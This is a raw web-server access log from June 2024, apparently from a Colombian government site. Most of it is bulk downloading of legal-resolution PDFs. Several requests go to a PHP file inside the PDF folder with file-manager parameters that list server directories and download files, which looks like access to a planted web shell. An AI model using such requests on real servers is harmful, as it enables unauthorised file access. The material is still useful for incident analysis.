3.224.220.101 - - [22/Jun/2024:06:45:50 -0500] "GET /BLA/resoluciones/AUTOS%202020/0566.pdf HTTP/1.1" 200 579988
3.224.220.101 - - [22/Jun/2024:06:45:54 -0500] "GET /BLA/resoluciones/AUTOS%202020/0563.pdf HTTP/1.1" 200 1372044
172.22.2.4 - - [22/Jun/2024:06:44:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
3.224.220.101 - - [22/Jun/2024:06:45:58 -0500] "GET /BLA/resoluciones/AUTOS%202020/0562.pdf HTTP/1.1" 200 723981
52.70.240.171 - - [22/Jun/2024:06:46:02 -0500] "GET /BLA/resoluciones/AUTOS%202020/0560.pdf HTTP/1.1" 200 912341
23.22.35.162 - - [22/Jun/2024:06:46:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/0557.pdf HTTP/1.1" 200 985794
52.70.240.171 - - [22/Jun/2024:06:46:10 -0500] "GET /BLA/resoluciones/AUTOS%202020/1332.pdf HTTP/1.1" 200 313486
3.224.220.101 - - [22/Jun/2024:06:46:14 -0500] "GET /BLA/resoluciones/AUTOS%202020/0556.pdf HTTP/1.1" 200 363690
3.224.220.101 - - [22/Jun/2024:06:46:18 -0500] "GET /BLA/resoluciones/AUTOS%202020/1331.pdf HTTP/1.1" 200 299729
201.245.192.253 - - [22/Jun/2024:06:46:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.70.240.171 - - [22/Jun/2024:06:46:22 -0500] "GET /BLA/resoluciones/AUTOS%202020/0554.pdf HTTP/1.1" 200 713458
52.70.240.171 - - [22/Jun/2024:06:46:26 -0500] "GET /BLA/resoluciones/AUTOS%202020/1330.pdf HTTP/1.1" 200 313514
47.128.41.219 - - [22/Jun/2024:06:46:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4232.pdf&ft=download&white=1 HTTP/1.1" 200 360103
23.22.35.162 - - [22/Jun/2024:06:46:30 -0500] "GET /BLA/resoluciones/AUTOS%202020/0553.pdf HTTP/1.1" 200 363495
23.22.35.162 - - [22/Jun/2024:06:46:34 -0500] "GET /BLA/resoluciones/AUTOS%202020/1329.pdf HTTP/1.1" 200 318429
23.22.35.162 - - [22/Jun/2024:06:46:38 -0500] "GET /BLA/resoluciones/AUTOS%202020/1327.pdf HTTP/1.1" 200 349477
52.70.240.171 - - [22/Jun/2024:06:46:42 -0500] "GET /BLA/resoluciones/AUTOS%202020/0551.pdf HTTP/1.1" 200 573100
23.22.35.162 - - [22/Jun/2024:06:46:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/0548.pdf HTTP/1.1" 200 1554728
52.70.240.171 - - [22/Jun/2024:06:46:50 -0500] "GET /BLA/resoluciones/AUTOS%202020/1322.pdf HTTP/1.1" 200 362172
172.22.2.4 - - [22/Jun/2024:06:46:50 -0500] "GET /BLA/boletinlegal/Circulares/2020/Circular%20No.%2000018%20del%2002%20de%20diciembre%20del%202020.pdf HTTP/1.1" 304 -
3.224.220.101 - - [22/Jun/2024:06:46:54 -0500] "GET /BLA/resoluciones/AUTOS%202020/0545.pdf HTTP/1.1" 200 292201
23.22.35.162 - - [22/Jun/2024:06:46:58 -0500] "GET /BLA/resoluciones/AUTOS%202020/1320.pdf HTTP/1.1" 200 359020
52.70.240.171 - - [22/Jun/2024:06:47:02 -0500] "GET /BLA/resoluciones/AUTOS%202020/0542.pdf HTTP/1.1" 200 596288
23.22.35.162 - - [22/Jun/2024:06:47:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/1319.pdf HTTP/1.1" 200 356931
3.224.220.101 - - [22/Jun/2024:06:47:11 -0500] "GET /BLA/resoluciones/AUTOS%202020/0539.pdf HTTP/1.1" 200 572710
52.70.240.171 - - [22/Jun/2024:06:47:17 -0500] "GET /BLA/resoluciones/AUTOS%202020/1310.pdf HTTP/1.1" 200 333120
201.245.192.253 - - [22/Jun/2024:06:47:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
23.22.35.162 - - [22/Jun/2024:06:47:19 -0500] "GET /BLA/resoluciones/AUTOS%202020/0536.pdf HTTP/1.1" 200 280392
3.224.220.101 - - [22/Jun/2024:06:47:22 -0500] "GET /BLA/resoluciones/AUTOS%202020/1309.pdf HTTP/1.1" 200 347071
47.128.118.122 - - [22/Jun/2024:06:47:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0516.pdf&ft=download&white=1 HTTP/1.1" 200 839335
23.22.35.162 - - [22/Jun/2024:06:47:26 -0500] "GET /BLA/resoluciones/AUTOS%202020/0533.pdf HTTP/1.1" 200 256600
23.22.35.162 - - [22/Jun/2024:06:47:30 -0500] "GET /BLA/resoluciones/AUTOS%202020/1308.pdf HTTP/1.1" 200 361906
3.224.220.101 - - [22/Jun/2024:06:47:34 -0500] "GET /BLA/resoluciones/AUTOS%202020/0530.pdf HTTP/1.1" 200 466002
3.224.220.101 - - [22/Jun/2024:06:47:38 -0500] "GET /BLA/resoluciones/AUTOS%202020/1305.pdf HTTP/1.1" 200 379820
52.70.240.171 - - [22/Jun/2024:06:47:43 -0500] "GET /BLA/resoluciones/AUTOS%202020/0527.pdf HTTP/1.1" 200 308661
3.224.220.101 - - [22/Jun/2024:06:47:46 -0500] "GET /BLA/resoluciones/AUTOS%202020/1304.pdf HTTP/1.1" 200 350446
23.22.35.162 - - [22/Jun/2024:06:47:50 -0500] "GET /BLA/resoluciones/AUTOS%202020/0524.pdf HTTP/1.1" 200 708680
52.70.240.171 - - [22/Jun/2024:06:47:54 -0500] "GET /BLA/resoluciones/AUTOS%202020/1303.pdf HTTP/1.1" 200 349113
3.224.220.101 - - [22/Jun/2024:06:47:58 -0500] "GET /BLA/resoluciones/AUTOS%202020/0521.pdf HTTP/1.1" 200 846180
3.224.220.101 - - [22/Jun/2024:06:48:02 -0500] "GET /BLA/resoluciones/AUTOS%202020/1302.pdf HTTP/1.1" 200 350501
3.224.220.101 - - [22/Jun/2024:06:48:06 -0500] "GET /BLA/resoluciones/AUTOS%202020/0518.pdf HTTP/1.1" 200 538285
3.224.220.101 - - [22/Jun/2024:06:48:10 -0500] "GET /BLA/resoluciones/AUTOS%202020/1301.pdf HTTP/1.1" 200 341196
47.128.40.101 - - [22/Jun/2024:06:48:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Crequerimientos_old%5C&f=index.html&ft=download&white=1 HTTP/1.1" 200 -
3.224.220.101 - - [22/Jun/2024:06:48:14 -0500] "GET /BLA/resoluciones/AUTOS%202020/0515.pdf HTTP/1.1" 200 876477
201.245.192.253 - - [22/Jun/2024:06:48:18 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
23.22.35.162 - - [22/Jun/2024:06:48:19 -0500] "GET /BLA/resoluciones/AUTOS%202020/1298.pdf HTTP/1.1" 200 348551
3.224.220.101 - - [22/Jun/2024:06:48:22 -0500] "GET /BLA/resoluciones/AUTOS%202020/0512.pdf HTTP/1.1" 200 557799
23.22.35.162 - - [22/Jun/2024:06:48:26 -0500] "GET /BLA/resoluciones/AUTOS%202020/0509.pdf HTTP/1.1" 200 809759
66.249.66.38 - - [22/Jun/2024:06:48:27 -0500] "GET /asi-es-el-tramite-para-obtener-el-certificado-de-conservacion-ambiental-2022.html HTTP/1.1" 200 935
52.70.240.171 - - [22/Jun/2024:06:48:30 -0500] "GET /BLA/resoluciones/AUTOS%202020/1295.pdf HTTP/1.1" 200 361619
52.70.240.171 - - [22/Jun/2024:06:48:34 -0500] "GET /BLA/resoluciones/AUTOS%202020/1293.pdf HTTP/1.1" 200 396799
23.22.35.162 - - [22/Jun/2024:06:48:38 -0500] "GET /BLA/resoluciones/AUTOS%202020/0506.pdf HTTP/1.1" 200 613562
52.70.240.171 - - [22/Jun/2024:06:48:42 -0500] "GET /BLA/resoluciones/AUTOS%202020/0503.pdf HTTP/1.1" 200 461209
23.22.35.162 - - [22/Jun/2024:06:48:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/1292.pdf HTTP/1.1" 200 380357
186.102.111.74 - - [22/Jun/2024:06:48:49 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
3.224.220.101 - - [22/Jun/2024:06:48:50 -0500] "GET /BLA/resoluciones/AUTOS%202020/0500.pdf HTTP/1.1" 200 954837
186.102.111.74 - - [22/Jun/2024:06:48:49 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
23.22.35.162 - - [22/Jun/2024:06:48:54 -0500] "GET /BLA/resoluciones/AUTOS%202020/1290.pdf HTTP/1.1" 200 378380
52.70.240.171 - - [22/Jun/2024:06:48:58 -0500] "GET /BLA/resoluciones/AUTOS%202020/0499.pdf HTTP/1.1" 200 392761
186.102.111.74 - - [22/Jun/2024:06:49:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+Zp2o/H9KAAjXE4vhRc09scM3ZIZ5xOgSrrJg9RkkF/ClM25TmS/kSM36AzR2W3oKCrc4AKhIIlWRjjKrqismUGYwel2URfiHGJ31hbUna45IV9Hu/8x8hyQsltGuzbK0tmDEnsn77IeRO7Q3wh3PfN46dr4S1AASF/21Jfpau7X1VEnq/P9efxd7KUZSH6YR/BZGFoLNTA6cphaYmMmlBQ23uyPhbZftm1CDTuFPacOB4vg4faomucJgF3LflWCILO1bjSTDHCw==&u=U2FsdGVkX1/ow3U+eTbB+6QEK6Ei9JJhqvdXuU/ssWY=&y=U2FsdGVkX19OPk9QlHO3jzBCKAII6rMFltDDVmJXl/aLQWCHBMzw/5iWpT+wswQm HTTP/1.1" 200 26
47.128.25.240 - - [22/Jun/2024:06:48:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1543.pdf&ft=download&white=1 HTTP/1.1" 200 97959
